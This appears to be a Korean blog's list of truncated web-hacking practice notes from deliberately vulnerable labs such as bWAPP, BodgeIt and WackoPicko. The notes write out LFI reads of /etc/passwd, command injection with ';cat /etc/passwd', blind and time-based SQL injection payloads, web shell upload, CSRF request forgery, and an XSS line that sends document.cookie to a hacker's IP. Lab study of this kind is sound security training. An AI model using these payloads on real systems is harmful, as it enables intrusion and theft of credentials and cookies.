php 확장자 종류 확인 (구글에 찾아보기) php2 php3 파일 확장자로 바꿔서 올리면 된다 here을 누른다.
owasp 실습(bwapp)-8 (Remote & Local File Inclusion (RFI/LFI)) 서버 다운로드 취약점
·
Web hacking
서버 다운로드 취약점 + 원격 명령어 실행 english fr 언어를 변경하면 안에 url 이 자꾸 바뀌는 것을 알수있다. 그러므로 lang_fr.php 이파일들이 자꾸 실행되는것을알수있다 그로므로 language 뒤를 바꾼다. language=/etc/passwd&action=go language=../../../etc/passwd&action=go 출력완료. lang_fr.php => 있는곳에서 실행이되게한다. -----------------------------------
eternallybored.org/misc/netcat/ netcat 1.11 for Win32/Win64 eternallybored.org netcat 1.11 을 다운하여 푼다. 백신에 걸리면 예외처리나 방화벽을 끄세요 검사제외하기 ---------------------------- nelookup www.nsa.gov 처럼 nslookup명령어만 사용이된디. 이걸 쉽게 볼려면 커맨드창을 띄운다(cmd) nslookup 내가원하는url 주소 nslookup www.google.co.kr nslookup www.nav.gov;ls ; 를추가 하면 두개를 이어서 출력하지만 nslookup www.nav.gov | ls ls만 실행이된다. www.nsa.gov;cat /etc/passwd 이거나 www.n..
owasp 실습(bwapp)-5 (SQL Injection - Stored (Blog))
·
Web hacking
entry에 aa를 입력하면 insert into table values(no, date, entry, owner,) 이런식으로 예상을하고 어떻게 순서가 insert into table values(no, date(), 'aa', user()) insert into table values(no, date(), 'aa', (select @@version)) 'aa' 이부분이 바로 사용자가 입력을 하는부분이므로 이 entry 위치에 sql injection을 걸면된다 insert into table values(no, date, entry, owner) 사용자의 입력부분(aa)을 조작해서 다음 결과가 나오게한다 - ----------------현재 접속중인 db의 전체 테이블 목록리스트를 출력(우리의 목적)..
XML/XPath Injection (Login Form) 요기에 id password의 정보로 로그인을하면된다. 데이터베이스의 느낌이라고 생각하면 된다. 성공하엿다 --------------------------- xml - 데이터를 저장하거나, 데이터를 송수신 할떄 쓰는 프로토콜 ex) 6명의 회원 정보를 관리하고 싶다. db 설치 - 웹 서비스 연동 -> 복잡하고,불편하다 간단히 소량의 데이터를 저장/전송 -> xml,json,yaml 복잡하고 가동성이 떨어져서 잘쓰지않는다 그래서 여러가지가 나오고 xml은 거의안쓰고 JSON(단점 ;표 쉼표 그런게많아서 눈을 알아보기가 힘들다),Yaml을많이쓴다
owasp 실습(bwapp) -3 (sql injection blind (ws/soap)
·
Web hacking
sql injection blind (ws/soap) 영화를 선택했을떄 티켓수가 나온다. 이페이지에서 sql injection을 해보면된다.
owasp 실습(bwapp) -2 (sql injection blind time based)
·
Web hacking
blind time based 참거짓 반응보기----------------------- ' or 1=1# (불가) ' or 1=2# (불가) 필터링되있기 떄문에 참거짓을 확인할수가없다. 이럴떄 이러한 조건을 준다. sleep()= mysql 에서 사용하는 내장 함수이다. 사용자가 지정한 시간만큼 실행 대기\ 참 반응을 주면 ' or 1=1 and sleep(1)# 위에 빙글빙글 도는 것처럼 대기하는 것을 알수있다. 반대로 거짓반응을 보면 ' or 1=2 and sleep(1)# 거짓반응이되서 sleep이 실행이되지않으니까 참일떄만 대기를 하는걸 알수있다. 1) 현재 접속중인 DB의 users 테이블의 첫번쨰 컬럼에서 두번쨰 문자 를 찾자. limit 0,1 0은 첫번쨰 컬럼 1은 행을 의미 limit 0..
vmware로 open virtualmachine bee-box SQL injection blind booolean based ------------------(참/거짓반응) ' or 1=1 (거짓 반응) 1. 현재 접속중인 db의 글자수와 첫번째 문자 ' or 1=1 and length(database())=5# (and 전까지 참 그뒤를 참으로 만들어버리는것이다.) 'or '1'='1' and substring(database(),1,1) > 'a'# (소문자인지 대문자인지 소문자가 아스키코드가 더크다.) 'or '1'='1' and substring(database(),1,1) > 'f'# 답은 '`b' ' or 1=1 and substring(database(),1,1)='b'# ' or 1=1 ..
oswasp 실습(BodgeIt)
·
Web hacking
------------------------------ script 공격 alert('taktaktak') --------------------------------------- sqlmap은 적용이되지않는다. --------------------------------- - ---------------------------- 5글자를 넣으라고한다. about us 들어가서! 저것을복사해본다 admin@thebodgeitstore.com admin@thebodgeitstore.com' or '1'='1'# 주석처리가 불가능하다 select * from user where username='--' and password='' 원래는 주석처리가되서 로그인이되면 이번것은 select * from user whe..
owasp 실습(WackoPicko)
·
Web hacking
WackoPicko 들어가기 burp suite 잡기 로그인하고() tak.php 파일 업로드한뒤 burp suite 잡기 image/png로 변경 여길보면 upload 라는곳에 된다는것을알수있다 들어가보자 ------------------------------------------ ------------------------------------ 이런식으로 팝업 창이뜬다. --------------------------------------------------------------- -------------------- 댓글스크립트삽입 악성 script 삽입 . 이런식으로 공격가능 netxt --------------------------------- ---------------------------..
owasp 실습 (peruggia)
·
Web hacking
sourceforge.net/projects/owaspbwa/files/latest/download OWASP download하기. vmware에 올리고 자기 ip들어가기 peruggia 계정정보 탈취하기. 1) 첫번쨰 방법 로그인 ' or '1'='1'# 2) 파일업로드를 이용한 계정탈취 php 파일을만들고 upload한뒤 burp suite로 프록시를잡는다 그리고 content-Type : appli~이것을 content-Type :image/png로 변환한다 그리고 forward한뒤 저파일올라온것을 클릭하면 계정탈취가 가능하다~! ------------------------------------------------------- 3) sqlmap 도구 활용 위치 복사후 1.현재사용중인 데이터베이스 ..
owasp zap 설치! https://www.zaproxy.org/download/ 파일다운로드취약점------------------------------------------------------------------------------------- 간단한 웹쉘 만들기 webhack 사이트에서 글하나 등록하고나서 서버에 웹셀업로드 다운로드 텍스트로 다운이됨 다운로드가 된다는 것은 웹쉘이 실행이 되지 않는 것이지 서버에는 정상적으로 업로드가 되었다. 서버의 파일 업로드 경로를 찾아서, 직접 실행시켜주면 된다. 192.168.0.100/webhack/board/download.php?file=core/shell.php var/www/html/webhack/board/core/shell.php 경로를찾고..
csrf(크로스사이트 요청위조),좀비
·
Web hacking
change Account Settings들어가서 버프수트로 잡기 패스워드 변경요청을 버프수트 프록시로 잡았다. 이요청패킷을 피해자가 실행되게한다. 1.패스워드 변경요청을 프록시로잡으면 post방식으로 변경할 값이 서버로 전달됩니다. 이게 겟요청이면 GET http://....member_modify_ok.php?exec=modify&name=core&email=core&password=123&repassword=123 이렇게적용이가능하다. url 쓰고 뒤에 데이타를 쓰면 가능하지만 현재는 post방식인데 get방식으로 바꿔볼까????? 이런생각을할수있다 애를 get요청으로 바꿔본다. 참고로 15,16 줄의 공백은 지우면안된다!중요 POST방식을>>>>>>>GET방식으로!!!! GET /webhack/m..
웹해킹시간 제로보드취약점 기존스크립트유지
·
Web hacking
이미지 다운로드를 클릭하면 다운로드 횟수가 증가하는걸보고 업데이트 유추 이미지다운첫번쨰꺼를 누르고버프수트로 잡았을떄 filenum=1 이거를 2로바꾸면 첨부파일의 두번쨰 꺼가 보이게되는것을보고 filenum=1이서버쿼리의 일부분이되는걸알수있다 모든게시글이 같은 내용으로 수정이된다. 따라서 내가 지정한 게시글만 수정되도록한다. concat함수를 이용해 그전에 주입했던 스크립트들을 살려두고 또 하나의 스크립트를 넣기위해 (웹해킹 사이트말고 제로보드사이트.) 1 대신 1=10,memo=''+where+no=64%23 을 입력 update board set download1=10,memo=''+where+no=64%23=download1=10,memo=''+where+no=64%23+1 1=10,memo=''+..
웹해킹.kr 버프슈트 intruder 자동 회원가입등, sqlmap,제로보드 취약점
·
Web hacking
http://192.168.0.100/webhack/ 관리자의 아이디가 killer 이며, 비밀번호는 모른다. 단서를 통해 비밀번호가 coffe로 시작하는 소문자 10자리 인것을 알아냈다. 관리자로 로그인하라 3자리는 w n o i *프록시로만 해결 방법1 ' or 'a'='a'# 방법 2 var b = Array.from(Array(26).keys(), x => String.fromCharCode(x + 97)); for(var i = 7; i
웹해킹 ( beebug,xss공격,beef툴,setoolkit,사용자계정탈취)
·
Web hacking
beebug,xss공격,beef툴,setoolkit,사용자계정탈취 XSS (크로스사이트 스크립트, 크로스사이트 스크립팅, Cross Site Scripting) 취약점 1. 정의 - 검증되지 않은 입력 값으로 인해 사용자의 웹 브라우저에서 의도하지 않은 악성 스크립트가 실행되는 취약점이다. - 외부 입력이 동적 웹페이지 생성에 사용될 경우, 전송된 동적 웹 페이지를 열람하는 접속자의 권한으로 부적절한 스크립트가 수행되는 취약점이다. - 공격을 통해 사용자의 개인정보 및 쿠키정보 탈취, 악성코드 감염, 웹 페이지 변조 등이 발생한다. - 서버를 공격하는게 아니라, 서버를 경유해 클라이언트를 공격하는 것이다. 시판이나 웹 메일 등에 악의적인 스크립트를 삽입하여 비정상적인 페이지가 보이게해 타 사용..
파이썬웹해킹 시작
·
Web hacking
document.location=http://해커ip/cookie=?document.cookie csrf 크로사이트 요청 위조 피해자의 아이디는 알지만 비밀번호는 몰라.그래도 로그인 하고싶다. 피해자의 계정 비밀번호를 내가원하는 값으로 바꾸게 하자. 요청위조 내pc에서 내 비밀번호를 바꿔보니 정상적인 요청은 다음과 같다. www.naver.com/account.jsp?passwd=ksdfgy849 https://nid.naver.com/user2/help/myInfo.nhn?m=viewChangePasswd&lang=ko_KR&pass=034848dw4qddqd pass=~~~~이걸추가하면 비밀번호가 초기화 되더라 ㅇ이걸 사용자가 실행을하면 비밀번호가 바뀜 비밀번호를 변경하는 요청(url)을 피해자가 실..